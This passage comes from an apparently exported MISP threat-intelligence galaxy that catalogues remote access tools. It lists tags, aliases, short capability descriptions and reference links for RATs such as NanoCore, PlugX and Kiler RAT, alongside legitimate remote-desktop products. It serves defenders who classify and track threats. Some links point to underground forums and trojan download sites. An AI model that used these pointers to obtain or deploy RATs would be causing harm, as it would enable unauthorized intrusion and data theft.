Table 5960. Table References
Links
https://leakforums.net/thread-36962

JCage

The tag is: misp-galaxy:rat="JCage"

Table 5961. Table References
Links
https://leakforums.net/thread-363920

Nuclear RAT

Nuclear RAT (short for Nuclear Remote Administration Tool) is a backdoor trojan horse that infects Windows NT family systems (Windows 2000, XP, 2003).

The tag is: misp-galaxy:rat="Nuclear RAT"

Table 5962. Table References
Links
http://malware.wikia.com/wiki/Nuclear_RAT
http://www.nuclearwintercrew.com/Products-View/21/Nuclear_RAT_2.1.0/

Ozone

C++ REMOTE CONTROL PROGRAM

The tag is: misp-galaxy:rat="Ozone"

Table 5963. Table References
Links
http://ozonercp.com/

Xanity

The tag is: misp-galaxy:rat="Xanity"

Table 5964. Table References
Links
https://github.com/alienwithin/xanity-php-rat

DarkMoon

The tag is: misp-galaxy:rat="DarkMoon"

DarkMoon is also known as:

Dark Moon

Xpert

The tag is: misp-galaxy:rat="Xpert"

Table 5965. Table References
Links
http://broad-product.biz/forum/r-a-t-(remote-administration-tools)/xpert-rat-3-0-10-by-abronsius(vb6)/
https://www.nulled.to/topic/18355-xpert-rat-309/
https://trickytamilan.blogspot.lu/2016/03/xpert-rat.html

Kiler RAT

This remote access trojan (RAT) has capabilities ranging from manipulating the registry to opening a reverse shell. From stealing credentials stored in browsers to accessing the victims webcam. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread utilizing physic devices, such as USB drives, but also to use the victim as a pivot point to gain more access laterally throughout the network. This remote access trojan could be classified as a variant of the well known njrat, as they share many similar features such as their display style, several abilities and a general template for communication methods . However, where njrat left off KilerRat has taken over. KilerRat is a very feature rich RAT with an active development force that is rapidly gaining in popularity amongst the middle eastern community and the world.

The tag is: misp-galaxy:rat="Kiler RAT"

Kiler RAT is also known as:

Njw0rm

View relationships graph

Kiler RAT has relationships with:

similar: misp-galaxy:rat="NJRat" with estimative-language:likelihood-probability="likely"

Table 5966. Table References
Links
https://www.alienvault.com/blogs/labs-research/kilerrat-taking-over-where-njrat-remote-access-trojan-left-off

Brat

The tag is: misp-galaxy:rat="Brat"

MINI-MO

The tag is: misp-galaxy:rat="MINI-MO"

Lost Door

Unlike most attack tools that one can only find in cybercriminal underground markets, Lost Door is very easy to obtain. It’s promoted on social media sites like YouTube and Facebook. Its maker, “OussamiO,” even has his own Facebook page where details on his creation can be found. He also has a dedicated blog (hxxp://lost-door[.]blogspot[.]com/) where tutorial videos and instructions on using the RAT is found. Any cybercriminal or threat actor can purchase and use the RAT to launch attacks.

The tag is: misp-galaxy:rat="Lost Door"

Lost Door is also known as:

LostDoor

Table 5967. Table References
Links
http://lost-door.blogspot.lu/
http://blog.trendmicro.com/trendlabs-security-intelligence/lost-door-rat-accessible-customizable-attack-tool/
https://www.cyber.nj.gov/threat-profiles/trojan-variants/lost-door-rat

Loki RAT

Loki RAT is a php RAT that means no port forwarding is needed for this RAT, If you dont know how to setup this RAT click on tutorial.

The tag is: misp-galaxy:rat="Loki RAT"

Table 5968. Table References
Links
https://www.rekings.com/loki-rat-php-rat/

MLRat

The tag is: misp-galaxy:rat="MLRat"

Table 5969. Table References
Links
https://github.com/BahNahNah/MLRat

SpyCronic

The tag is: misp-galaxy:rat="SpyCronic"

Table 5970. Table References
Links
http://perfect-conexao.blogspot.lu/2014/09/spycronic-1021.html
http://www.connect-trojan.net/2013/09/spycronic-v1.02.1.html
https://ranger-exploit.com/spycronic-v1-02-1/

Pupy

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

The tag is: misp-galaxy:rat="Pupy"

View relationships graph

Pupy has relationships with:

similar: misp-galaxy:mitre-tool="Pupy - S0192" with estimative-language:likelihood-probability="likely"

Table 5971. Table References
Links
https://github.com/n1nj4sec/pupy

Nova

Nova is a proof of concept demonstrating screen sharing over UDP hole punching.

The tag is: misp-galaxy:rat="Nova"

Table 5972. Table References
Links
http://novarat.sourceforge.net/

BD Y3K RAT

The tag is: misp-galaxy:rat="BD Y3K RAT"

BD Y3K RAT is also known as:

Back Door Y3K RAT
Y3k

Table 5973. Table References
Links
https://tools.cisco.com/security/center/viewIpsSignature.x?signatureId=9401&signatureSubId=2
https://tools.cisco.com/security/center/viewIpsSignature.x?signatureId=9401&signatureSubId=0&softwareVersion=6.0&releaseVersion=S177
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20292
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20264

Turkojan

Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.

The tag is: misp-galaxy:rat="Turkojan"

Table 5974. Table References
Links
http://turkojan.blogspot.lu/

TINY

TINY is a set of programs that lets you control a DOS computer from any Java-capable machine over a TCP/IP connection. It is comparable to programs like VNC, CarbonCopy, and GotoMyPC except that the host machine is a DOS computer rather than a Windows one.

The tag is: misp-galaxy:rat="TINY"

Table 5975. Table References
Links
http://josh.com/tiny/

SharK

sharK is an advanced reverse connecting, firewall bypassing remote administration tool written in VB6. With sharK you will be able to administrate every PC (using Windows OS) remotely.

The tag is: misp-galaxy:rat="SharK"

SharK is also known as:

SHARK
Shark

View relationships graph

SharK has relationships with:

similar: misp-galaxy:ransomware="Shark" with estimative-language:likelihood-probability="likely"

Table 5976. Table References
Links
https://www.security-database.com/toolswatch/SharK-3-Remote-Administration-Tool.html
http://lpc1.clpccd.cc.ca.us/lpc/mdaoud/CNT7501/NETLABS/Ethical_Hacking_Lab_05.pdf

Snowdoor

Backdoor.Snowdoor is a Backdoor Trojan Horse that allows unauthorized access to an infected computer. It creates an open C drive share with its default settings. By default, the Trojan listens on port 5,328.

The tag is: misp-galaxy:rat="Snowdoor"

Snowdoor is also known as:

Backdoor.Blizzard
Backdoor.Fxdoor
Backdoor.Snowdoor
Backdoor:Win32/Snowdoor

Table 5977. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2003-022018-5040-99

Paradox

The tag is: misp-galaxy:rat="Paradox"

Table 5978. Table References
Links
https://www.nulled.to/topic/155464-paradox-rat/

SpyNote

Android RAT

The tag is: misp-galaxy:rat="SpyNote"

View relationships graph

SpyNote has relationships with:

similar: misp-galaxy:malpedia="SpyNote" with estimative-language:likelihood-probability="likely"

Table 5979. Table References
Links
https://www.rekings.com/spynote-v4-android-rat/

ZOMBIE SLAYER

The tag is: misp-galaxy:rat="ZOMBIE SLAYER"

HTTP WEB BACKDOOR

The tag is: misp-galaxy:rat="HTTP WEB BACKDOOR"

NET-MONITOR PRO

Net Monitor for Employees lets you see what everyone’s doing - without leaving your desk. Monitor the activity of all employees. Plus you can share your screen with your employees PCs, making demos and presentations much easier.

The tag is: misp-galaxy:rat="NET-MONITOR PRO"

Table 5980. Table References
Links
https://networklookout.com/help/

DameWare Mini Remote Control

Affordable remote control software for all your customer support and help desk needs.

The tag is: misp-galaxy:rat="DameWare Mini Remote Control"

DameWare Mini Remote Control is also known as:

dameware

Table 5981. Table References
Links
http://www.dameware.com/dameware-mini-remote-control

Remote Utilities

Remote Utilities is a free remote access program with some really great features. It works by pairing two remote computers together with what they call an "Internet ID." You can control a total of 10 PCs with Remote Utilities.

The tag is: misp-galaxy:rat="Remote Utilities"

Table 5982. Table References
Links
https://www.remoteutilities.com/

Ammyy Admin

Ammyy Admin is a completely portable remote access program that’s extremely simple to setup. It works by connecting one computer to another via an ID supplied by the program.

The tag is: misp-galaxy:rat="Ammyy Admin"

Ammyy Admin is also known as:

Ammyy

Table 5983. Table References
Links
http://ammyy-admin.soft32.com/

Ultra VNC

UltraVNC works a bit like Remote Utilities, where a server and viewer is installed on two PCs, and the viewer is used to control the server.

The tag is: misp-galaxy:rat="Ultra VNC"

Table 5984. Table References
Links
http://www.uvnc.com/

AeroAdmin

AeroAdmin is probably the easiest program to use for free remote access. There are hardly any settings, and everything is quick and to the point, which is perfect for spontaneous support.

The tag is: misp-galaxy:rat="AeroAdmin"

Table 5985. Table References
Links
http://www.aeroadmin.com/en/

Windows Remote Desktop

Windows Remote Desktop is the remote access software built into the Windows operating system. No additional download is necessary to use the program.

The tag is: misp-galaxy:rat="Windows Remote Desktop"

RemotePC

RemotePC, for good or bad, is a more simple free remote desktop program. You’re only allowed one connection (unless you upgrade) but for many of you, that’ll be just fine.

The tag is: misp-galaxy:rat="RemotePC"

Table 5986. Table References
Links
https://www.remotepc.com/

Seecreen

Seecreen (previously called Firnass) is an extremely tiny (500 KB), yet powerful free remote access program that’s absolutely perfect for on-demand, instant support.

The tag is: misp-galaxy:rat="Seecreen"

Seecreen is also known as:

Firnass

Table 5987. Table References
Links
http://seecreen.com/

Chrome Remote Desktop

Chrome Remote Desktop is an extension for the Google Chrome web browser that lets you setup a computer for remote access from any other Chrome browser.

The tag is: misp-galaxy:rat="Chrome Remote Desktop"

Table 5988. Table References
Links
https://chrome.google.com/webstore/detail/chrome-remote-desktop/gbchcmhmhahfdphkhkmpfmihenigjmpp?hl=en

AnyDesk

AnyDesk is a remote desktop program that you can run portably or install like a regular program.

The tag is: misp-galaxy:rat="AnyDesk"

Table 5989. Table References
Links
https://anydesk.com/remote-desktop

LiteManager

LiteManager is another remote access program, and it’s strikingly similar to Remote Utilities, which I explain on the first page of this list. However, unlike Remote Utilities, which can control a total of only 10 PCs, LiteManager supports up to 30 slots for storing and connecting to remote computers, and also has lots of useful features.

The tag is: misp-galaxy:rat="LiteManager"

Table 5990. Table References
Links
http://www.litemanager.com/

Comodo Unite

Comodo Unite is another free remote access program that creates a secure VPN between multiple computers. Once a VPN is established, you can remotely have access to applications and files through the client software.

The tag is: misp-galaxy:rat="Comodo Unite"

Table 5991. Table References
Links
https://www.comodo.com/home/download/download.php?prod=comodounite

ShowMyPC

ShowMyPC is a portable and free remote access program that’s nearly identical to UltraVNC but uses a password to make a connection instead of an IP address.

The tag is: misp-galaxy:rat="ShowMyPC"

Table 5992. Table References
Links
https://showmypc.com/

join.me

join.me is a remote access program from the producers of LogMeIn that provides quick access to another computer over an internet browser.

The tag is: misp-galaxy:rat="join.me"

Table 5993. Table References
Links
https://www.join.me/

DesktopNow

DesktopNow is a free remote access program from NCH Software. After optionally forwarding the proper port number in your router, and signing up for a free account, you can access your PC from anywhere through a web browser.

The tag is: misp-galaxy:rat="DesktopNow"

Table 5994. Table References
Links
http://www.nchsoftware.com/remotedesktop/index.html

BeamYourScreen

Another free and portable remote access program is BeamYourScreen. This program works like some of the others in this list, where the presenter is given an ID number they must share with another user so they can connect to the presenter’s screen.

The tag is: misp-galaxy:rat="BeamYourScreen"

Table 5995. Table References
Links
http://www.beamyourscreen.com/

Casa RAT

The tag is: misp-galaxy:rat="Casa RAT"

Bandook RAT

Bandook is a FWB#++ reverse connection rat (Remote Administration Tool), with a small size server when packed 30 KB, and a long list of amazing features

The tag is: misp-galaxy:rat="Bandook RAT"

Table 5996. Table References
Links
http://www.nuclearwintercrew.com/Products-View/57/Bandook_RAT_v1.35NEW_/[http://www.nuclearwintercrew.com/Products-View/57/Bandook_RAT_v1.35NEW_/]

Cerberus RAT

The tag is: misp-galaxy:rat="Cerberus RAT"

Table 5997. Table References
Links
http://www.hacktohell.org/2011/05/setting-up-cerberus-ratremote.html

Syndrome RAT

The tag is: misp-galaxy:rat="Syndrome RAT"

Snoopy

Snoopy is a Remote Administration Tool. Software for controlling user computer remotely from other computer on local network or Internet.

The tag is: misp-galaxy:rat="Snoopy"

Table 5998. Table References
Links
http://www.spy-emergency.com/research/S/Snoopy.html

5p00f3r.N$ RAT

The tag is: misp-galaxy:rat="5p00f3r.N$ RAT"

P. Storrie RAT

The tag is: misp-galaxy:rat="P. Storrie RAT"

Storrie RAT is also known as:
- P.Storrie RAT

xHacker Pro RAT

The tag is: misp-galaxy:rat="xHacker Pro RAT"

NetDevil

Backdoor.NetDevil allows a hacker to remotely control an infected computer.

The tag is: misp-galaxy:rat="NetDevil"

View relationships graph

NetDevil has relationships with:

similar: misp-galaxy:rat="Net Devil" with estimative-language:likelihood-probability="likely"

Table 5999. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2002-021310-3452-99

NanoCore

In September of 2015, a DigiTrust client visited a web link that was providing an Adobe Flash Player update. The client, an international retail organization, attempted to download and run what appeared to be a regular update. The computer trying to download this update was a back office system that processed end of day credit card transactions. This system also had the capability of connecting to the corporate network which contained company sales reports. DigiTrust experts were alerted to something malicious and blocked the download. The investigation found that what appeared to be an Adobe Flash Player update, was a Remote Access Trojan called NanoCore. If installation had been successful, customer credit card data, personal information, and internal sales information could have been captured and monetized. During the analysis of NanoCore, our experts found that there was much more to this RAT than simply being another Remote Access Trojan.

The tag is: misp-galaxy:rat="NanoCore"

View relationships graph

NanoCore has relationships with:

similar: misp-galaxy:tool="NanoCoreRAT" with estimative-language:likelihood-probability="likely"

Table 6000. Table References
Links
https://www.digitrustgroup.com/nanocore-not-your-average-rat/

Cobian RAT

The Zscaler ThreatLabZ research team has been monitoring a new remote access Trojan (RAT) family called Cobian RAT since February 2017. The RAT builder for this family was first advertised on multiple underground forums where cybercriminals often buy and sell exploit and malware kits. This RAT builder caught our attention as it was being offered for free and had lot of similarities to the njRAT/H-Worm family

The tag is: misp-galaxy:rat="Cobian RAT"

View relationships graph

Cobian RAT has relationships with:

similar: misp-galaxy:malpedia="Cobian RAT" with estimative-language:likelihood-probability="likely"

Table 6001. Table References
Links
https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat

Netsupport Manager

NetSupport Manager continues to deliver the very latest in remote access, PC support and desktop management capabilities. From a desktop, laptop, tablet or smartphone, monitor multiple systems in a single action, deliver hands-on remote support, collaborate and even record or play back sessions. When needed, gather real-time hardware and software inventory, monitor services and even view system config remotely to help resolve issues quickly.

The tag is: misp-galaxy:rat="Netsupport Manager"

Table 6002. Table References
Links
http://www.netsupportmanager.com/index.asp

Vortex

The tag is: misp-galaxy:rat="Vortex"

Assassin

The tag is: misp-galaxy:rat="Assassin"

Net Devil

The tag is: misp-galaxy:rat="Net Devil"

Net Devil is also known as:

NetDevil

View relationships graph

Net Devil has relationships with:

similar: misp-galaxy:rat="NetDevil" with estimative-language:likelihood-probability="likely"

Table 6003. Table References
Links
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20702

A4Zeta

The tag is: misp-galaxy:rat="A4Zeta"

Table 6004. Table References
Links
http://www.megasecurity.org/trojans/a/a4zeta/A4zeta_b2.html

Greek Hackers RAT

The tag is: misp-galaxy:rat="Greek Hackers RAT"

Table 6005. Table References
Links
http://www.connect-trojan.net/2013/04/greek-hackers-rat-1.0.html?m=0

MRA RAT

The tag is: misp-galaxy:rat="MRA RAT"

Table 6006. Table References
Links
http://www.connect-trojan.net/2013/04/greek-hackers-rat-1.0.html?m=0

Sparta RAT

The tag is: misp-galaxy:rat="Sparta RAT"

Table 6007. Table References
Links
http://www.connect-trojan.net/2015/09/sparta-rat-1.2-by-azooz-ejram.html

LokiTech

The tag is: misp-galaxy:rat="LokiTech"

MadRAT

The tag is: misp-galaxy:rat="MadRAT"

Tequila Bandita

The tag is: misp-galaxy:rat="Tequila Bandita"

Table 6008. Table References
Links
http://www.connect-trojan.net/2013/07/tequila-bandita-1.3b2.html

Toquito Bandito

The tag is: misp-galaxy:rat="Toquito Bandito"

Table 6009. Table References
Links
http://www.megasecurity.org/trojans/t/toquitobandito/Toquitobandito_all.html

MofoTro

MofoTro is a new rat coded by Cool_mofo_2.

The tag is: misp-galaxy:rat="MofoTro"

Table 6010. Table References
Links
http://www.megasecurity.org/trojans/m/mofotro/Mofotro_beta.html
http://www.megasecurity.org/trojans/m/mofotro/Mofotroresurrection.html
http://www.megasecurity.org/trojans/m/mofotro/Mofotro_beta1.5.html

Hav-RAT

Written in Delphi

The tag is: misp-galaxy:rat="Hav-RAT"

Table 6011. Table References
Links
http://www.megasecurity.org/trojans/h/hav/Havrat1.2.html

ComRAT

ComRAT is a remote access tool suspected of being a decedent of Agent.btz and used by Turla.

The tag is: misp-galaxy:rat="ComRAT"

View relationships graph

ComRAT has relationships with:

similar: misp-galaxy:mitre-malware="ComRAT - S0126" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Agent.BTZ" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Agent.BTZ" with estimative-language:likelihood-probability="likely"

Table 6012. Table References
Links
https://attack.mitre.org/wiki/Software/S0126

4H RAT

4H RAT is malware that has been used by Putter Panda since at least 2007.

The tag is: misp-galaxy:rat="4H RAT"

View relationships graph

4H RAT has relationships with:

similar: misp-galaxy:mitre-malware="4H RAT - S0065" with estimative-language:likelihood-probability="likely"

Table 6013. Table References
Links
https://attack.mitre.org/wiki/Software/S0065

Darknet RAT

The tag is: misp-galaxy:rat="Darknet RAT"

Darknet RAT is also known as:

Dark NET RAT

Table 6014. Table References
Links
http://www.connect-trojan.net/2015/06/dark-net-rat-v.0.3.9.0.html

CIA RAT

The tag is: misp-galaxy:rat="CIA RAT"

Minimo

The tag is: misp-galaxy:rat="Minimo"

miniRAT

The tag is: misp-galaxy:rat="miniRAT"

Pain RAT

The tag is: misp-galaxy:rat="Pain RAT"

PlugX

PLUGX is a remote access tool (RAT) used in targeted attacks aimed toward government-related institutions and key industries. It was utilized the same way as Poison Ivy, a RAT involved in a campaign dating back to 2008.

The tag is: misp-galaxy:rat="PlugX"

PlugX is also known as:

Korplug
SOGU
Scontroller

View relationships graph

PlugX has relationships with:

similar: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="PlugX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="PlugX" with estimative-language:likelihood-probability="likely"

Table 6015. Table References
Links
https://www.lastline.com/labsblog/an-analysis-of-plugx-malware/
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PLUGX

UNITEDRAKE

The existence of the UNITEDRAKE RAT first came to light in 2014 as part of a series of classified documents leaked by former NSA contractor Edward Snowden.

The tag is: misp-galaxy:rat="UNITEDRAKE"

Table 6016. Table References
Links
http://thehackernews.com/2017/09/shadowbrokers-unitedrake-hacking.html
https://www.itnews.com.au/news/shadowbrokers-release-unitedrake-nsa-malware-472771

MegaTrojan

Written in Visual Basic

The tag is: misp-galaxy:rat="MegaTrojan"

Table 6017. Table References
Links
http://www.megasecurity.org/trojans/m/mega/Megatrojan1.0.html

Venomous Ivy

The tag is: misp-galaxy:rat="Venomous Ivy"

Xploit

The tag is: misp-galaxy:rat="Xploit"

Arctic R.A.T.

The tag is: misp-galaxy:rat="Arctic R.A.T."

Arctic R.A.T. is also known as:

Artic

Table 6018. Table References
Links
http://anti-virus-soft.com/threats/artic

GOlden Phoenix

The tag is: misp-galaxy:rat="GOlden Phoenix"

Table 6019. Table References
Links
http://www.connect-trojan.net/2014/02/golden-phoenix-rat-0.2.html

GraphicBooting

The tag is: misp-galaxy:rat="GraphicBooting"

Table 6020. Table References
Links
http://www.connect-trojan.net/2014/10/graphicbooting-rat-v0.1-beta.html?m=0

Pocket RAT

The tag is: misp-galaxy:rat="Pocket RAT"

Erebus

The tag is: misp-galaxy:rat="Erebus"

View relationships graph

Erebus has relationships with:

similar: misp-galaxy:malpedia="Erebus (ELF)" with estimative-language:likelihood-probability="likely"

SharpEye

The tag is: misp-galaxy:rat="SharpEye"

Table 6021. Table References
Links
http://www.connect-trojan.net/2014/10/sharpeye-rat-1.0-beta-1.html
http://www.connect-trojan.net/2014/02/sharpeye-rat-1.0-beta-2.html

VorteX

The tag is: misp-galaxy:rat="VorteX"

Archelaus Beta

The tag is: misp-galaxy:rat="Archelaus Beta"

Table 6022. Table References
Links
http://www.connect-trojan.net/2014/02/archelaus-rat-beta.html

BlackHole

C# RAT (Remote Adminitration Tool) - Educational purposes only

The tag is: misp-galaxy:rat="BlackHole"

View relationships graph

BlackHole has relationships with:

similar: misp-galaxy:exploit-kit="BlackHole" with estimative-language:likelihood-probability="likely"

Table 6023. Table References
Links
https://github.com/hussein-aitlahcen/BlackHole

Vanguard

The tag is: misp-galaxy:rat="Vanguard"

Table 6024. Table References
Links
http://ktwox7.blogspot.lu/2010/12/vanguard-remote-administration.html

Ahtapod

The tag is: misp-galaxy:rat="Ahtapod"

Table 6025. Table References
Links
http://www.ibtimes.co.uk/turkish-journalist-baris-pehlivan-jailed-terrorism-was-framed-by-hackers-says-report-1577481

FINSPY

Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.

The tag is: misp-galaxy:rat="FINSPY"

View relationships graph

FINSPY has relationships with:

similar: misp-galaxy:tool="FINSPY" with estimative-language:likelihood-probability="likely"

Table 6026. Table References
Links
https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html

Seed RAT

Seed is a firewall bypass plus trojan, injects into default browser and has a simple purpose: to be compact (4kb server size) and useful while uploading bigger and full trojans, or even making Seed download them somewhere. Has computer info, process manager, file manager, with download, create folder, delete, execute and upload. And a remote download function. Everything with a easy to use interface, reminds an instant messenger.

The tag is: misp-galaxy:rat="Seed RAT"

Table 6027. Table References
Links
http://www.nuclearwintercrew.com/Products-View/25/Seed_1.1/

SharpBot

The tag is: misp-galaxy:rat="SharpBot"

TorCT PHP RAT

The tag is: misp-galaxy:rat="TorCT PHP RAT"

Table 6028. Table References
Links
https://github.com/alienwithin/torCT-PHP-RAT

A32s RAT

The tag is: misp-galaxy:rat="A32s RAT"

Char0n

The tag is: misp-galaxy:rat="Char0n"

Nytro

The tag is: misp-galaxy:rat="Nytro"

Syla

The tag is: misp-galaxy:rat="Syla"

Table 6029. Table References
Links
http://www.connect-trojan.net/2013/07/syla-rat-0.3.html

Cobalt Strike

Cobalt Strike is software for Adversary Simulations and Red Team Operations.

The tag is: misp-galaxy:rat="Cobalt Strike"

View relationships graph

Cobalt Strike has relationships with:

similar: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

Table 6030. Table References
Links
https://www.cobaltstrike.com/

Sakula

The RAT, which according to compile timestamps first surfaced in November 2012, has been used in targeted intrusions through 2015. Sakula enables an adversary to run interactive commands as well as to download and execute additional components.

The tag is: misp-galaxy:rat="Sakula"

Sakula is also known as:

Sakurel
VIPER

View relationships graph

Sakula has relationships with:

similar: misp-galaxy:mitre-malware="Sakula - S0074" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Sakula" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Sakula RAT" with estimative-language:likelihood-probability="likely"

Table 6031. Table References
Links
https://www.secureworks.com/research/sakula-malware-family

hcdLoader

hcdLoader is a remote access tool (RAT) that has been used by APT18.

The tag is: misp-galaxy:rat="hcdLoader"

View relationships graph

hcdLoader has relationships with:

similar: misp-galaxy:mitre-malware="hcdLoader - S0071" with estimative-language:likelihood-probability="likely"

Table 6032. Table References
Links
https://attack.mitre.org/wiki/Software/S0071

Crimson

The tag is: misp-galaxy:rat="Crimson"

View relationships graph

Crimson has relationships with:

similar: misp-galaxy:mitre-malware="Crimson - S0115" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Crimson" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Crimson RAT" with estimative-language:likelihood-probability="likely"

Table 6033. Table References
Links
http://www.connect-trojan.net/2015/01/crimson-rat-3.0.0.html

KjW0rm

The tag is: misp-galaxy:rat="KjW0rm"

View relationships graph

KjW0rm has relationships with:

similar: misp-galaxy:tool="KjW0rm" with estimative-language:likelihood-probability="likely"

Table 6034. Table References
Links
http://hack-defender.blogspot.fr/2015/12/kjw0rm-v05x.html

Ghost

The tag is: misp-galaxy:rat="Ghost"

Ghost is also known as:

Ucul

Table 6035. Table References
Links
https://www.youtube.com/watch?v=xXZW4ajVYkI

9002

The tag is: misp-galaxy:rat="9002"

Sandro RAT

The tag is: misp-galaxy:rat="Sandro RAT"

Mega

The tag is: misp-galaxy:rat="Mega"

WiRAT

The tag is: misp-galaxy:rat="WiRAT"

3PARA RAT

The tag is: misp-galaxy:rat="3PARA RAT"

View relationships graph

3PARA RAT has relationships with:

similar: misp-galaxy:mitre-malware="3PARA RAT - S0066" with estimative-language:likelihood-probability="likely"

Table 6036. Table References
Links
https://books.google.fr/books?isbn=2212290136

BBS RAT

The tag is: misp-galaxy:rat="BBS RAT"

Konni

KONNI is a remote access Trojan (RAT) that was first reported in May of 2017, but is believed to have been in use for over 3 years. As Part of our daily threat monitoring, FortiGuard Labs came across a new variant of the KONNI RAT and decided to take a deeper look.

The tag is: misp-galaxy:rat="Konni"

Konni is also known as:

KONNI

View relationships graph

Konni has relationships with:

similar: misp-galaxy:tool="KONNI" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Konni" with estimative-language:likelihood-probability="likely"

Table 6037. Table References
Links
https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant
https://www.cylance.com/en_us/blog/threat-spotlight-konni-stealthy-remote-access-trojan.html
https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/
http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html
https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/

Felismus RAT

Used by Sowbug

The tag is: misp-galaxy:rat="Felismus RAT"

Table 6038. Table References
Links
https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

Xsser

Xsser mRAT is a piece of malware that targets iOS devices that have software limitations removed. The app is installed via a rogue repository on Cydia, the most popular third-party application store for jailbroken iPhones. Once the malicious bundle has been installed and executed, it gains persistence - preventing the user from deleting it. The mRAT then makes server-side checks and proceeds to steal data from the user’s device and executes remote commands as directed by its command-and-control (C2) server.

The tag is: misp-galaxy:rat="Xsser"

Xsser is also known as:

mRAT

Table 6039. Table References
Links
https://blogs.akamai.com/2014/12/ios-and-android-os-targeted-by-man-in-the-middle-attacks.html
http://malware.wikia.com/wiki/Xsser_mRAT

GovRAT

GovRAT is an old cyberespionage tool, it has been in the wild since 2014 and it was used by various threat actors across the years.

The tag is: misp-galaxy:rat="GovRAT"

View relationships graph

GovRAT has relationships with:

similar: misp-galaxy:malpedia="GovRAT" with estimative-language:likelihood-probability="likely"

Table 6040. Table References
Links
http://securityaffairs.co/wordpress/41714/cyber-crime/govrat-platform.html
http://securityaffairs.co/wordpress/51202/cyber-crime/govrat-2-0-attacks.html

Rottie3

The tag is: misp-galaxy:rat="Rottie3"

Table 6041. Table References
Links
https://www.youtube.com/watch?v=jUg5—68Iqs

Killer RAT

The tag is: misp-galaxy:rat="Killer RAT"

Hi-Zor

The tag is: misp-galaxy:rat="Hi-Zor"

View relationships graph

Hi-Zor has relationships with:

similar: misp-galaxy:mitre-malware="Hi-Zor - S0087" with estimative-language:likelihood-probability="likely"

Table 6042. Table References
Links
https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat

Quaverse

Quaverse RAT or QRAT is a fairly new Remote Access Tool (RAT) introduced in May 2015. This RAT is marketed as an undetectable Java RAT. As you might expect from a RAT, the tool is capable of grabbing passwords, key logging and browsing files on the victim’s computer. On a regular basis for the past several months, we have observed the inclusion of QRAT in a number of spam campaigns.

The tag is: misp-galaxy:rat="Quaverse"

Quaverse is also known as:

QRAT

Table 6043. Table References
Links
https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT—Remote-Access-as-a-Service/

Heseber

The tag is: misp-galaxy:rat="Heseber"

Cardinal

Cardinal is a remote access trojan (RAT) discovered by Palo Alto Networks in 2017 and has been active for over two years. It is delivered via a downloader, known as Carp, and uses malicious macros in Microsoft Excel documents to compile embedded C# programming language source code into an executable that runs and deploys the Cardinal RAT. The malicious Excel files use different tactics to get the victims to execute it.

The tag is: misp-galaxy:rat="Cardinal"

View relationships graph

Cardinal has relationships with:

similar: misp-galaxy:tool="EVILNUM" with estimative-language:likelihood-probability="likely"

Table 6044. Table References
Links
https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/
https://www.scmagazine.com/cardinal-rats-unique-downloader-allowed-it-to-avoid-detection-for-years/article/651927/
https://www.cyber.nj.gov/threat-profiles/trojan-variants/cardinal
https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/

OmniRAT

Works on all Android, Windows, Linux and Mac devices!

The tag is: misp-galaxy:rat="OmniRAT"

View relationships graph

OmniRAT has relationships with:

similar: misp-galaxy:malpedia="OmniRAT" with estimative-language:likelihood-probability="likely"

Table 6045. Table References
Links
https://omnirat.eu/en/

Jfect

The tag is: misp-galaxy:rat="Jfect"

Table 6046. Table References
Links
https://www.youtube.com/watch?v=qKdoExQFb68

Trochilus

Trochilus is a remote access trojan (RAT) first identified in October 2015 when attackers used it to infect visitors of a Myanmar website. It was then used in a 2016 cyber-espionage campaign, dubbed "the Seven Pointed Dagger," managed by another group, "Group 27," who also uses the PlugX trojan. Trochilus is primarily spread via emails with a malicious .RAR attachment containing the malware. The trojan’s functionality includes a shellcode extension, remote uninstall, a file manager, and the ability to download and execute, upload and execute, and access the system information. Once present on a system, Trochilus can move laterally in the network for better access. This trojan operates in memory only and does not write to the disk, helping it evade detection.

The tag is: misp-galaxy:rat="Trochilus"

View relationships graph

Trochilus has relationships with:

similar: misp-galaxy:tool="Trochilus" with estimative-language:likelihood-probability="likely"

Table 6047. Table References
Links
https://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/
http://securityaffairs.co/wordpress/43889/cyber-crime/new-rat-trochilus.html

Matryoshka

